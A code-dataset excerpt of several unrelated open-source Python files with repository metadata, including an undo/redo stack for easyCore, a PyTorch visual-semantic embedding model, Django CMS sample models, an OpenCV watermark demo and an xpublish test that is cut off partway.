4a20f60850339cdc87c0c74a4d2a21787ace109e | 706 | py | Python | NATOConsole.py | twomilessolutions/NATOPhoneticAlphabetHelper | 1fe7dad64d177c2529518ff90b510774a027f257 | [
"MIT"
] | null | null | null | NATOConsole.py | twomilessolutions/NATOPhoneticAlphabetHelper | 1fe7dad64d177c2529518ff90b510774a027f257 | [
"MIT"
] | null | null | null | NATOConsole.py | twomilessolutions/NATOPhoneticAlphabetHelper | 1fe7dad64d177c2529518ff90b510774a027f257 | [
"MIT"
] | null | null | null | from NATOTranslator import NATOTranslator
from colorama import init, Fore
init()
def main():
word = input("\n\nEnter the word, phrase, or sentence you would like the NATO Phonetic translation for: ")
translator = NATOTranslator()
translation = translator.translate_string(word)
print_string = ""
counter = 0
counter_limit = 10
for line in translation:
print_string = print_string + line
counter += 1
if counter >= counter_limit:
counter = 0
print_string = print_string + "\n"
print(Fore.CYAN + print_string)
print(Fore.WHITE + "")
input("Press any key to exit...")
if __name__ == "__main__":
main() | 24.344828 | 110 | 0.635977 |
4a20f724ef26903de7d319cae9d6b9beb6b99f7e | 14,222 | py | Python | easyCore/Utils/UndoRedo.py | easyScience/easyCore | 5d16d5b27803277d0c44886f94dab599f764ae0b | [
"BSD-3-Clause"
] | 2 | 2021-11-02T10:22:45.000Z | 2022-02-18T23:41:19.000Z | easyCore/Utils/UndoRedo.py | easyScience/easyCore | 5d16d5b27803277d0c44886f94dab599f764ae0b | [
"BSD-3-Clause"
] | 114 | 2020-06-30T08:52:27.000Z | 2022-03-30T20:47:56.000Z | easyCore/Utils/UndoRedo.py | easyScience/easyCore | 5d16d5b27803277d0c44886f94dab599f764ae0b | [
"BSD-3-Clause"
] | 1 | 2022-03-04T13:01:09.000Z | 2022-03-04T13:01:09.000Z | # SPDX-FileCopyrightText: 2021 easyCore contributors <[email protected]>
# SPDX-License-Identifier: BSD-3-Clause
# © 2021 Contributors to the easyCore project <https://github.com/easyScience/easyCore>
__author__ = 'github.com/wardsimon'
__version__ = '0.1.0'
import abc
from collections import deque, UserDict
from typing import Union, Any, NoReturn, Callable, TypeVar, MutableMapping
from easyCore import borg
class UndoCommand(metaclass=abc.ABCMeta):
"""
The Command interface pattern
"""
def __init__(self, obj) -> None:
self._obj = obj
self._text = None
@abc.abstractmethod
def undo(self) -> NoReturn:
"""
Undo implementation which should be overwritten
"""
@abc.abstractmethod
def redo(self) -> NoReturn:
"""
Redo implementation which should be overwritten
"""
@property
def text(self) -> str:
return self._text
@text.setter
def text(self, text: str) -> NoReturn:
self._text = text
T_ = TypeVar('T_', bound=UndoCommand)
def dict_stack_deco(func: Callable) -> Callable:
def inner(obj, *args, **kwargs):
# Only do the work to a NotarizedDict.
if hasattr(obj, '_stack_enabled') and obj._stack_enabled:
if not kwargs:
borg.stack.push(DictStack(obj, *args))
else:
borg.stack.push(DictStackReCreate(obj, **kwargs))
else:
func(obj, *args, **kwargs)
return inner
class NotarizedDict(UserDict):
"""
A simple dict drop in for easyCore group classes. This is used as it wraps the get/set methods
"""
def __init__(self, **kwargs):
super().__init__(**kwargs)
self._borg = borg
self._stack_enabled = False
@classmethod
def _classname(cls):
# This method just returns the name of the class
return cls.__name__
@dict_stack_deco
def __setitem__(self, key, value):
super(NotarizedDict, self).__setitem__(key, value)
@dict_stack_deco
def __delitem__(self, key):
super(NotarizedDict, self).__delitem__(key)
def __repr__(self):
return f"{self._classname()}({self.data})"
@dict_stack_deco
def reorder(self, **kwargs):
self.data = kwargs.copy()
class CommandHolder:
"""
A holder for one or more commands which are added to the stack
"""
def __init__(self, text: str = None):
self._commands = deque()
self._text = text
self.__index = 0
def append(self, command: T_):
self._commands.appendleft(command)
def pop(self):
return self._commands.popleft()
def __iter__(self) -> T_:
while self.__index < len(self):
index = self.__index
self.__index += 1
yield self._commands[index]
self.__index = 0
def __len__(self) -> int:
return len(self._commands)
@property
def is_macro(self) -> bool:
return len(self) > 1
@property
def current(self) -> T_:
return self._commands[0]
@property
def text(self) -> str:
text = ''
if self._commands:
text = self._commands[-1].text
if self._text is not None:
text = self._text
return text
@text.setter
def text(self, text: str):
self._text = text
class UndoStack:
"""
Implement a version of QUndoStack without the QT
"""
def __init__(self, max_history: Union[int, type(None)] = None):
self._history = deque(maxlen=max_history)
self._future = deque(maxlen=max_history)
self._macro_running = False
self._command_running = False
self._max_history = max_history
self._enabled = False
@property
def enabled(self) -> bool:
return self._enabled
@enabled.setter
def enabled(self, state: bool):
if self.enabled and self._macro_running:
self.endMacro()
self._enabled = state
def force_state(self, state: bool):
self._enabled = state
@property
def history(self) -> deque:
return self._history
@property
def future(self) -> deque:
return self._future
def push(self, command: T_) -> NoReturn:
"""
Add a command to the history stack
"""
# If we're not enabled, then what are we doing!
if not self.enabled or self._command_running:
# Do the command and leave.
command.redo()
return
# If there's a macro add the command to the command holder
if self._macro_running:
self.history[0].append(command)
else:
# Else create the command holder and add it to the stack
com = CommandHolder()
com.append(command)
self.history.appendleft(com)
# Actually do the command
command.redo()
# Reset the future
self._future = deque(maxlen=self._max_history)
def pop(self) -> T_:
"""
!! WARNING - TO BE USED WITH EMINENCE CAUTION !!
!! THIS IS PROBABLY NOT THE FN YOU'RE LOOKING FOR, IT CAN BREAK A LOT OF STUFF !!
Sometimes you really don't want the last command. Remove it from the stack
:return: None
:rtype: None
"""
pop_it = self._history.popleft()
popped = pop_it.pop()
if len(pop_it) > 0:
self.history.appendleft(pop_it)
return popped
def clear(self) -> NoReturn:
"""
Remove any commands on the stack and reset the state
"""
self._history = deque(maxlen=self._max_history)
self._future = deque(maxlen=self._max_history)
self._macro_running = False
def undo(self) -> NoReturn:
"""
Undo the last change to the stack
"""
if self.canUndo():
# Move the command from the past to the future
this_command_stack = self._history.popleft()
self._future.appendleft(this_command_stack)
# Execute all undo commands
for command in this_command_stack:
try:
self._command_running = True
command.undo()
except Exception as e:
print(e)
finally:
self._command_running = False
def redo(self) -> NoReturn:
"""
Redo the last `undo` command on the stack
"""
if self.canRedo():
# Move from the future to the past
this_command_stack = self._future.popleft()
self._history.appendleft(this_command_stack)
# Need to go from right to left
this_command_stack = list(this_command_stack)
this_command_stack.reverse()
for command in this_command_stack:
try:
self._command_running = True
command.redo()
except Exception as e:
print(e)
finally:
self._command_running = False
def beginMacro(self, text: str) -> NoReturn:
"""
Start a bulk update i.e. multiple commands under one undo/redo command
"""
if self._macro_running:
raise AssertionError
com = CommandHolder(text)
self.history.appendleft(com)
self._macro_running = True
def endMacro(self) -> NoReturn:
"""
End a bulk update i.e. multiple commands under one undo/redo command
"""
if not self._macro_running:
raise AssertionError
self._macro_running = False
def canUndo(self) -> bool:
"""
Can the last command be undone?
"""
return len(self._history) > 0 and not self._macro_running
def canRedo(self) -> bool:
"""
Can we redo a command?
"""
return len(self._future) > 0 and not self._macro_running
def redoText(self) -> str:
"""
Text associated with a redo item.
"""
text = ''
if self.canRedo():
text = self.future[0].text
return text
def undoText(self) -> str:
"""
Text associated with a undo item.
"""
text = ''
if self.canUndo():
text = self.history[0].text
return text
class PropertyStack(UndoCommand):
"""
Stack operator for when a property setter is wrapped.
"""
def __init__(self, parent, func: Callable, old_value: Any, new_value: Any, text: str = None):
# self.setText("Setting {} to {}".format(func.__name__, new_value))
super().__init__(self)
self._parent = parent
self._old_value = old_value
self._new_value = new_value
self._set_func = func
self.text = f'{parent} value changed from {old_value} to {new_value}'
if text is not None:
self.text = text
def undo(self) -> NoReturn:
self._set_func(self._parent, self._old_value)
def redo(self) -> NoReturn:
self._set_func(self._parent, self._new_value)
class FunctionStack(UndoCommand):
def __init__(self, parent, set_func: Callable, unset_func: Callable, text: str = None):
super().__init__(self)
self._parent = parent
self._old_fn = set_func
self._new_fn = unset_func
self.text = f'{parent} called {set_func}'
if text is not None:
self.text = text
def undo(self):
self._new_fn()
def redo(self):
self._old_fn()
class DictStack(UndoCommand):
def __init__(self, in_dict: NotarizedDict, *args):
super().__init__(self)
self._parent = in_dict
self._deletion = False
self._creation = False
self._key = None
self._index = None
self._old_value = None
self._new_value = None
self.text = ''
if len(args) == 1:
# We are deleting
self._deletion = True
self._index = list(self._parent.keys()).index(args[0])
self._old_value = self._parent[args[0]]
self._key = args[0]
self.text = f'Deleting {args[0]} from {self._parent}'
elif len(args) == 2:
# We are either creating or setting
self._key = args[0]
self._new_value = args[1]
if self._key in self._parent.keys():
# We are modifying
self._old_value = self._parent[self._key]
self.text = f'Setting {self._parent}[{self._key}] from {self._old_value} to {self._new_value}'
else:
self._creation = True
self.text = f'Creating {self._parent}[{self._key}] with value {self._new_value}'
else:
raise ValueError
def undo(self) -> NoReturn:
if self._creation:
# Now we delete
self._parent.data.__delitem__(self._key)
else:
# Now we create/change value
if self._index is None:
self._parent.data.__setitem__(self._key, self._old_value)
else:
# This deals with placing an item in a place
keys = list(self._parent.keys())
values = list(self._parent.values())
keys.insert(self._index, self._key)
values.insert(self._index, self._old_value)
self._parent.reorder(**{k: v for k, v in zip(keys, values)})
def redo(self) -> NoReturn:
if self._deletion:
# Now we delete
self._parent.data.__delitem__(self._key)
else:
self._parent.data.__setitem__(self._key, self._new_value)
class DictStackReCreate(UndoCommand):
def __init__(self, in_dict: NotarizedDict, **kwargs):
super().__init__(self)
self._parent = in_dict
self._old_value = in_dict.data.copy()
self._new_value = kwargs
self.text = 'Updating dictionary'
def undo(self) -> NoReturn:
self._parent.data = self._old_value
def redo(self) -> NoReturn:
self._parent.data = self._new_value
def property_stack_deco(arg: Union[str, Callable], begin_macro=False) -> Callable:
"""
Decorate a `property` setter with undo/redo functionality
This decorator can be used as:
@property_stack_deco
def func()
....
or
@property_stack_deco("This is the undo/redo text)
def func()
....
In the latter case the argument is a string which might be evaluated.
The possible markups for this string are;
`obj` - The thing being operated on
`func` - The function being called
`name` - The name of the function being called.
`old_value` - The pre-set value
`new_value` - The post-set value
An example would be `Function {name}: Set from {old_value} to {new_value}`
"""
if isinstance(arg, Callable):
func = arg
name = func.__name__
def wrapper(obj, *args) -> NoReturn:
old_value = getattr(obj, name)
new_value = args[0]
if new_value == old_value:
return
if borg.debug:
print(f"I'm {obj} and have been set from {old_value} to {new_value}!")
borg.stack.push(PropertyStack(obj, func, old_value, new_value))
setattr(wrapper, 'func', func)
else:
txt = arg
def wrapper(func: Callable) -> Callable:
name = func.__name__
def inner_wrapper(obj, *args) -> NoReturn:
if begin_macro:
borg.stack.beginMacro(txt)
old_value = getattr(obj, name)
new_value = args[0]
if new_value == old_value:
return
if borg.debug:
print(f"I'm {obj} and have been set from {old_value} to {new_value}!")
borg.stack.push(PropertyStack(obj, func, old_value, new_value, text=txt.format(**locals())))
setattr(inner_wrapper, 'func', func)
return inner_wrapper
return wrapper
| 28.789474 | 110 | 0.576501 |
4a20f8880306bd41f14954d77c8f6c384e391867 | 428 | py | Python | plotly/validators/surface/colorbar/_len.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 2 | 2020-03-24T11:41:14.000Z | 2021-01-14T07:59:43.000Z | plotly/validators/surface/colorbar/_len.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | null | null | null | plotly/validators/surface/colorbar/_len.py | faezs/plotly.py | 6009b5b9c746e5d2a2849ad255a4eb234b551ed7 | [
"MIT"
] | 4 | 2019-06-03T14:49:12.000Z | 2022-01-06T01:05:12.000Z | import _plotly_utils.basevalidators
class LenValidator(_plotly_utils.basevalidators.NumberValidator):
def __init__(
self, plotly_name='len', parent_name='surface.colorbar', **kwargs
):
super(LenValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
edit_type='calc',
min=0,
role='style',
**kwargs
)
| 25.176471 | 73 | 0.602804 |
4a20f89d24e4b13809d0a48b743a220ef5fbb78f | 733 | py | Python | martypy/RateAverager.py | robotical/martypy | afc1f89d471875ca1beb775f375438f97fc33679 | [
"Apache-2.0"
] | 8 | 2017-08-02T11:31:50.000Z | 2022-01-05T14:36:53.000Z | martypy/RateAverager.py | robotical/martypy | afc1f89d471875ca1beb775f375438f97fc33679 | [
"Apache-2.0"
] | 17 | 2017-07-24T22:39:43.000Z | 2022-01-05T14:41:20.000Z | martypy/RateAverager.py | robotical/martypy | afc1f89d471875ca1beb775f375438f97fc33679 | [
"Apache-2.0"
] | 5 | 2017-11-12T08:51:18.000Z | 2020-11-27T09:28:46.000Z | import time
class RateAverager:
def __init__(self, windowSizeMinSecs = 1):
self.sampleCount = 0
self.windowSizeMinSecs = windowSizeMinSecs
self.lastCalcSecs = time.time()
self.prevVal = 0
self.totalCount = 0
def addSample(self):
self.sampleCount += 1
self.totalCount += 1
def getAvg(self):
if self.lastCalcSecs + self.windowSizeMinSecs < time.time():
rsltVal = self.sampleCount / (time.time() - self.lastCalcSecs)
self.lastCalcSecs = time.time()
self.sampleCount = 0
self.prevVal = rsltVal
return rsltVal
return self.prevVal
def getTotal(self):
return self.totalCount
| 27.148148 | 74 | 0.601637 |
4a20f8afebe770c046b6775f0028d75dba283c48 | 12,990 | py | Python | model.py | Straffern/vsepp | abd87733f7081ae864c29ca5c09809cf2ee316bb | [
"Apache-2.0"
] | null | null | null | model.py | Straffern/vsepp | abd87733f7081ae864c29ca5c09809cf2ee316bb | [
"Apache-2.0"
] | null | null | null | model.py | Straffern/vsepp | abd87733f7081ae864c29ca5c09809cf2ee316bb | [
"Apache-2.0"
] | null | null | null | import torch
import torch.nn as nn
import torch.nn.init
import torchvision.models as models
from torch.autograd import Variable
from torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence
import torch.backends.cudnn as cudnn
from torch.nn.utils.clip_grad import clip_grad_norm
import numpy as np
from collections import OrderedDict
def l2norm(X):
"""L2-normalize columns of X
"""
norm = torch.pow(X, 2).sum(dim=1, keepdim=True).sqrt()
X = torch.div(X, norm)
return X
def EncoderImage(data_name, img_dim, embed_size, finetune=False,
cnn_type='vgg19', use_abs=False, no_imgnorm=False):
"""A wrapper to image encoders. Chooses between an encoder that uses
precomputed image features, `EncoderImagePrecomp`, or an encoder that
computes image features on the fly `EncoderImageFull`.
"""
if data_name.endswith('_precomp'):
img_enc = EncoderImagePrecomp(
img_dim, embed_size, use_abs, no_imgnorm)
else:
img_enc = EncoderImageFull(
embed_size, finetune, cnn_type, use_abs, no_imgnorm)
return img_enc
# tutorials/09 - Image Captioning
class EncoderImageFull(nn.Module):
def __init__(self, embed_size, finetune=False, cnn_type='vgg19',
use_abs=False, no_imgnorm=False):
"""Load pretrained VGG19 and replace top fc layer."""
super(EncoderImageFull, self).__init__()
self.embed_size = embed_size
self.no_imgnorm = no_imgnorm
self.use_abs = use_abs
# Load a pre-trained model
self.cnn = self.get_cnn(cnn_type, True)
# For efficient memory usage.
for param in self.cnn.parameters():
param.requires_grad = finetune
# Replace the last fully connected layer of CNN with a new one
if cnn_type.startswith('vgg'):
self.fc = nn.Linear(self.cnn.classifier._modules['6'].in_features,
embed_size)
self.cnn.classifier = nn.Sequential(
*list(self.cnn.classifier.children())[:-1])
elif cnn_type.startswith('resnet'):
self.fc = nn.Linear(self.cnn.module.fc.in_features, embed_size)
self.cnn.module.fc = nn.Sequential()
self.init_weights()
def get_cnn(self, arch, pretrained):
"""Load a pretrained CNN and parallelize over GPUs
"""
if pretrained:
print("=> using pre-trained model '{}'".format(arch))
model = models.__dict__[arch](pretrained=True)
else:
print("=> creating model '{}'".format(arch))
model = models.__dict__[arch]()
if arch.startswith('alexnet') or arch.startswith('vgg'):
model.features = nn.DataParallel(model.features)
model.cuda()
else:
model = nn.DataParallel(model).cuda()
return model
def load_state_dict(self, state_dict):
"""
Handle the models saved before commit pytorch/vision@989d52a
"""
if 'cnn.classifier.1.weight' in state_dict:
state_dict['cnn.classifier.0.weight'] = state_dict[
'cnn.classifier.1.weight']
del state_dict['cnn.classifier.1.weight']
state_dict['cnn.classifier.0.bias'] = state_dict[
'cnn.classifier.1.bias']
del state_dict['cnn.classifier.1.bias']
state_dict['cnn.classifier.3.weight'] = state_dict[
'cnn.classifier.4.weight']
del state_dict['cnn.classifier.4.weight']
state_dict['cnn.classifier.3.bias'] = state_dict[
'cnn.classifier.4.bias']
del state_dict['cnn.classifier.4.bias']
super(EncoderImageFull, self).load_state_dict(state_dict)
def init_weights(self):
"""Xavier initialization for the fully connected layer
"""
r = np.sqrt(6.) / np.sqrt(self.fc.in_features +
self.fc.out_features)
self.fc.weight.data.uniform_(-r, r)
self.fc.bias.data.fill_(0)
def forward(self, images):
"""Extract image feature vectors."""
features = self.cnn(images)
# normalization in the image embedding space
features = l2norm(features)
# linear projection to the joint embedding space
features = self.fc(features)
# normalization in the joint embedding space
if not self.no_imgnorm:
features = l2norm(features)
# take the absolute value of the embedding (used in order embeddings)
if self.use_abs:
features = torch.abs(features)
return features
class EncoderImagePrecomp(nn.Module):
def __init__(self, img_dim, embed_size, use_abs=False, no_imgnorm=False):
super(EncoderImagePrecomp, self).__init__()
self.embed_size = embed_size
self.no_imgnorm = no_imgnorm
self.use_abs = use_abs
self.fc = nn.Linear(img_dim, embed_size)
self.init_weights()
def init_weights(self):
"""Xavier initialization for the fully connected layer
"""
r = np.sqrt(6.) / np.sqrt(self.fc.in_features +
self.fc.out_features)
self.fc.weight.data.uniform_(-r, r)
self.fc.bias.data.fill_(0)
def forward(self, images):
"""Extract image feature vectors."""
# assuming that the precomputed features are already l2-normalized
features = self.fc(images)
# normalize in the joint embedding space
if not self.no_imgnorm:
features = l2norm(features)
# take the absolute value of embedding (used in order embeddings)
if self.use_abs:
features = torch.abs(features)
return features
def load_state_dict(self, state_dict):
"""Copies parameters. overwritting the default one to
accept state_dict from Full model
"""
own_state = self.state_dict()
new_state = OrderedDict()
for name, param in state_dict.items():
if name in own_state:
new_state[name] = param
super(EncoderImagePrecomp, self).load_state_dict(new_state)
# tutorials/08 - Language Model
# RNN Based Language Model
class EncoderText(nn.Module):
def __init__(self, vocab_size, word_dim, embed_size, num_layers,
use_abs=False):
super(EncoderText, self).__init__()
self.use_abs = use_abs
self.embed_size = embed_size
# word embedding
self.embed = nn.Embedding(vocab_size, word_dim)
# caption embedding
self.rnn = nn.GRU(word_dim, embed_size, num_layers, batch_first=True)
self.init_weights()
def init_weights(self):
self.embed.weight.data.uniform_(-0.1, 0.1)
def forward(self, x, lengths):
"""Handles variable size captions
"""
# Embed word ids to vectors
x = self.embed(x)
packed = pack_padded_sequence(x, lengths, batch_first=True)
# Forward propagate RNN
out, _ = self.rnn(packed)
# Reshape *final* output to (batch_size, hidden_size)
padded = pad_packed_sequence(out, batch_first=True)
I = torch.LongTensor(lengths).view(-1, 1, 1)
if torch.cuda.is_available():
I = Variable(I.expand(x.size(0), 1, self.embed_size)-1).cuda()
else:
I = Variable(I.expand(x.size(0), 1, self.embed_size)-1)
out = torch.gather(padded[0], 1, I).squeeze(1)
# normalization in the joint embedding space
out = l2norm(out)
# take absolute value, used by order embeddings
if self.use_abs:
out = torch.abs(out)
return out
def cosine_sim(im, s):
"""Cosine similarity between all the image and sentence pairs
"""
return im.mm(s.t())
def order_sim(im, s):
"""Order embeddings similarity measure $max(0, s-im)$
"""
YmX = (s.unsqueeze(1).expand(s.size(0), im.size(0), s.size(1))
- im.unsqueeze(0).expand(s.size(0), im.size(0), s.size(1)))
score = -YmX.clamp(min=0).pow(2).sum(2).sqrt().t()
return score
class ContrastiveLoss(nn.Module):
"""
Compute contrastive loss
"""
def __init__(self, margin=0, measure=False, max_violation=False):
super(ContrastiveLoss, self).__init__()
self.margin = margin
if measure == 'order':
self.sim = order_sim
else:
self.sim = cosine_sim
self.max_violation = max_violation
def forward(self, im, s):
# compute image-sentence score matrix
scores = self.sim(im, s)
diagonal = scores.diag().view(im.size(0), 1)
d1 = diagonal.expand_as(scores)
d2 = diagonal.t().expand_as(scores)
# compare every diagonal score to scores in its column
# caption retrieval
cost_s = (self.margin + scores - d1).clamp(min=0)
# compare every diagonal score to scores in its row
# image retrieval
cost_im = (self.margin + scores - d2).clamp(min=0)
# clear diagonals
mask = torch.eye(scores.size(0)) > .5
I = Variable(mask)
if torch.cuda.is_available():
I = I.cuda()
cost_s = cost_s.masked_fill_(I, 0)
cost_im = cost_im.masked_fill_(I, 0)
# keep the maximum violating negative for each query
if self.max_violation:
cost_s = cost_s.max(1)[0]
cost_im = cost_im.max(0)[0]
return cost_s.sum() + cost_im.sum()
class VSE(object):
"""
rkiros/uvs model
"""
def __init__(self, opt):
# tutorials/09 - Image Captioning
# Build Models
self.grad_clip = opt.grad_clip
self.img_enc = EncoderImage(opt.data_name, opt.img_dim, opt.embed_size,
opt.finetune, opt.cnn_type,
use_abs=opt.use_abs,
no_imgnorm=opt.no_imgnorm)
self.txt_enc = EncoderText(opt.vocab_size, opt.word_dim,
opt.embed_size, opt.num_layers,
use_abs=opt.use_abs)
if torch.cuda.is_available():
self.img_enc.cuda()
self.txt_enc.cuda()
cudnn.benchmark = True
# Loss and Optimizer
self.criterion = ContrastiveLoss(margin=opt.margin,
measure=opt.measure,
max_violation=opt.max_violation)
params = list(self.txt_enc.parameters())
params += list(self.img_enc.fc.parameters())
if opt.finetune:
params += list(self.img_enc.cnn.parameters())
self.params = params
self.optimizer = torch.optim.Adam(params, lr=opt.learning_rate)
self.Eiters = 0
def state_dict(self):
state_dict = [self.img_enc.state_dict(), self.txt_enc.state_dict()]
return state_dict
def load_state_dict(self, state_dict):
self.img_enc.load_state_dict(state_dict[0])
self.txt_enc.load_state_dict(state_dict[1])
def train_start(self):
"""switch to train mode
"""
self.img_enc.train()
self.txt_enc.train()
def val_start(self):
"""switch to evaluate mode
"""
self.img_enc.eval()
self.txt_enc.eval()
def forward_emb(self, images, captions, lengths, volatile=False):
"""Compute the image and caption embeddings
"""
# Set mini-batch dataset
images = Variable(images, volatile=volatile)
captions = Variable(captions, volatile=volatile)
if torch.cuda.is_available():
images = images.cuda()
captions = captions.cuda()
# Forward
img_emb = self.img_enc(images)
cap_emb = self.txt_enc(captions, lengths)
return img_emb, cap_emb
def forward_loss(self, img_emb, cap_emb, **kwargs):
"""Compute the loss given pairs of image and caption embeddings
"""
loss = self.criterion(img_emb, cap_emb)
# self.logger.update('Le', loss.data[0], img_emb.size(0))
self.logger.update('Le', loss.item(), img_emb.size(0))
return loss
def train_emb(self, images, captions, lengths, ids=None, *args):
"""One training step given images and captions.
"""
self.Eiters += 1
self.logger.update('Eit', self.Eiters)
self.logger.update('lr', self.optimizer.param_groups[0]['lr'])
# compute the embeddings
img_emb, cap_emb = self.forward_emb(images, captions, lengths)
# measure accuracy and record loss
self.optimizer.zero_grad()
loss = self.forward_loss(img_emb, cap_emb)
# compute gradient and do SGD step
loss.backward()
if self.grad_clip > 0:
clip_grad_norm(self.params, self.grad_clip)
self.optimizer.step()
| 33.307692 | 79 | 0.603849 |
4a20f9e020e57ef3dc9d876e29e43a5d0de5faf1 | 2,425 | py | Python | duden/common.py | Scriptim/duden | 0d0c0dbb0b6d33f8fb269a8bde50a227e3fe44da | [
"MIT"
] | null | null | null | duden/common.py | Scriptim/duden | 0d0c0dbb0b6d33f8fb269a8bde50a227e3fe44da | [
"MIT"
] | null | null | null | duden/common.py | Scriptim/duden | 0d0c0dbb0b6d33f8fb269a8bde50a227e3fe44da | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from string import ascii_lowercase
def recursively_extract(node, exfun, maxdepth=2):
"""
Transform a html ul/ol tree into a python list tree.
Converts a html node containing ordered and unordered lists and list items
into an object of lists with tree-like structure. Leaves are retrieved by
applying `exfun` function to the html nodes not containing any ul/ol list.
Args:
node: BeautifulSoup HTML node to traverse
exfun: function to apply to every string node found
maxdepth: maximal depth of lists to go in the node
Returns:
A tree-like python object composed of lists.
Examples:
>>> node_content = \
'''
<ol>
<li>Hase</li>
<li>Nase<ol><li>Eins</li><li>Zwei</li></ol></li>
</ol>'''
>>> node = BeautifulSoup(node_content, "lxml")
>>> recursively_extract(node, lambda x: x)
[<li>Hase</li>, [<li>Eins</li>, <li>Zwei</li>]]
>>> recursively_extract(node, lambda x: x.get_text())
['Hase', ['Eins', 'Zwei']]
"""
if node.name in ['ol', 'ul']:
lilist = node
else:
lilist = node.ol or node.ul
if lilist and maxdepth:
# apply 'recursively_extract' to every 'li' node found under this node
return [recursively_extract(li, exfun, maxdepth=(maxdepth - 1))
for li in lilist.find_all('li', recursive=False)]
# if this node doesn't contain 'ol' or 'ul' node, return the transformed
# leaf (using the 'exfun' function)
return exfun(node)
def print_tree_of_strings(tree):
"""
Print a tree of strings up to depth 2
Args:
tree: tree of strings
Example:
>>> print_tree_of_strings(['Hase', ['Eins', 'Zwei']])
0. Hase
<BLANKLINE>
1. a. Eins
b. Zwei
"""
if isinstance(tree, str):
print(tree)
return
for i1, m1 in enumerate(tree):
if type(m1) is str:
print("{:>2}. {}".format(i1, m1))
elif type(m1) is list:
for i2, m2 in zip(ascii_lowercase, m1):
indent = "{:>2}. ".format(i1) if i2 == 'a' else " " * 4
print("{} {}. {}".format(indent, i2, m2))
print()
def print_string_or_list(obj):
if isinstance(obj, list):
for elem in obj:
print(elem)
else:
print(obj)
def clear_text(text):
return text.replace('\xad', '').strip()
| 27.556818 | 78 | 0.583093 |
4a20fa5c08946ca8269c7a4066919dffa8e0e847 | 1,288 | py | Python | cms/test_utils/project/sampleapp/models.py | Mario-Kart-Felix/django-cms | 6d68439fe7fd59d000f99e27c1f2135a3f9c816a | [
"BSD-3-Clause"
] | 5,659 | 2015-01-01T02:42:30.000Z | 2020-10-07T02:38:29.000Z | cms/test_utils/project/sampleapp/models.py | rpep/django-cms | 53dddb106f45963f9f8393d434b4313fa3bbdf54 | [
"BSD-3-Clause"
] | 3,264 | 2015-01-02T10:11:48.000Z | 2020-10-08T13:15:07.000Z | cms/test_utils/project/sampleapp/models.py | rpep/django-cms | 53dddb106f45963f9f8393d434b4313fa3bbdf54 | [
"BSD-3-Clause"
] | 2,132 | 2015-01-01T11:28:21.000Z | 2020-10-06T09:09:11.000Z | from django.db import models
from django.urls import reverse
from treebeard.mp_tree import MP_Node
from cms.models.fields import PageField, PlaceholderField
class Category(MP_Node):
parent = models.ForeignKey('self', blank=True, null=True, on_delete=models.CASCADE)
name = models.CharField(max_length=20)
description = PlaceholderField('category_description', 600)
def __str__(self):
return self.name
def get_absolute_url(self):
return reverse('category_view', args=[self.pk])
class Meta:
verbose_name_plural = 'categories'
class Picture(models.Model):
image = models.ImageField(upload_to="pictures")
category = models.ForeignKey(Category, on_delete=models.CASCADE)
class SampleAppConfig(models.Model):
namespace = models.CharField(
default=None,
max_length=100,
unique=True,
)
class PageOnDeleteCascade(models.Model):
page = PageField(null=True)
class PageOnDeleteSetNull(models.Model):
page = PageField(on_delete=models.SET_NULL, null=True)
class PlaceholderOnDeleteCascade(models.Model):
placeholder = PlaceholderField('body', null=True)
class PlaceholderOnDeleteSetNull(models.Model):
placeholder = PlaceholderField('body', on_delete=models.SET_NULL, null=True)
| 25.76 | 87 | 0.736801 |
4a20fcd8e539deca23af8f30e45f3c12de8e2b73 | 795 | py | Python | opencv_learn/charpter03/demo_13.15.py | zhangxinzhou/play_game | 854448f8416b2d3f98bb2c3ed0f7d834a61593de | [
"Apache-2.0"
] | null | null | null | opencv_learn/charpter03/demo_13.15.py | zhangxinzhou/play_game | 854448f8416b2d3f98bb2c3ed0f7d834a61593de | [
"Apache-2.0"
] | null | null | null | opencv_learn/charpter03/demo_13.15.py | zhangxinzhou/play_game | 854448f8416b2d3f98bb2c3ed0f7d834a61593de | [
"Apache-2.0"
] | null | null | null | import cv2
import numpy as np
# 读取原始图像
lena = cv2.imread(r"..\lena.jpg", 0)
# 读取水印
watermark = cv2.imread(r"..\watermark.bmp", 0)
# 将水印图像内的值255处理为1,以方便嵌入
w = watermark[:, :] > 0
watermark[w] = 1
# 读取原始载体图像的shape值
r, c = lena.shape
# ===========嵌入过程=============
# 生产元素值都是254的数组
t254 = np.ones((r, c), dtype=np.uint8) * 254
# 获取lena图像的高7位
lenaH7 = cv2.bitwise_and(lena, t254)
# 将watermark嵌入lenaH7内
e = cv2.bitwise_or(lenaH7, watermark)
# ===========提取过程=============
# 生成元素都是1的数组
t1 = np.ones((r, c), dtype=np.uint8)
# 从载体图像内提取水印图像
wm = cv2.bitwise_and(e, t1)
print(wm)
# 将水印图像内的1处理为255,以方便显示
w = wm[:, :] > 0
wm[w] = 255
# ===========显示=============
cv2.imshow("lena", lena)
cv2.imshow("watermark", watermark * 255)
cv2.imshow("e", e)
cv2.imshow("wm", wm)
cv2.waitKey()
cv2.destroyAllWindows()
| 22.083333 | 46 | 0.621384 |
4a20fd016a53fae0b0eb8ab29795a188a0723802 | 702 | py | Python | tests/test_fsspec_compat.py | mhaberler/xpublish | 38228d0399d97dae591d4c1fa2a7664a2e2a89c6 | [
"MIT"
] | null | null | null | tests/test_fsspec_compat.py | mhaberler/xpublish | 38228d0399d97dae591d4c1fa2a7664a2e2a89c6 | [
"MIT"
] | 29 | 2020-09-24T05:59:43.000Z | 2022-03-31T01:04:22.000Z | tests/test_fsspec_compat.py | benbovy/xpublish | 563b0b7b02aace1e9ea5aa299a90a15873692a78 | [
"MIT"
] | null | null | null | import json
import pytest
import xarray as xr
from xpublish import Rest
from xpublish.utils.zarr import create_zmetadata, jsonify_zmetadata
from .utils import TestMapper
@pytest.fixture(scope='module')
def airtemp_ds():
ds = xr.tutorial.open_dataset('air_temperature')
return ds
def test_get_zmetadata_key(airtemp_ds):
mapper = TestMapper(Rest(airtemp_ds).app)
actual = json.loads(mapper['.zmetadata'].decode())
expected = jsonify_zmetadata(airtemp_ds, create_zmetadata(airtemp_ds))
assert actual == expected
def test_missing_key_raises_keyerror(airtemp_ds):
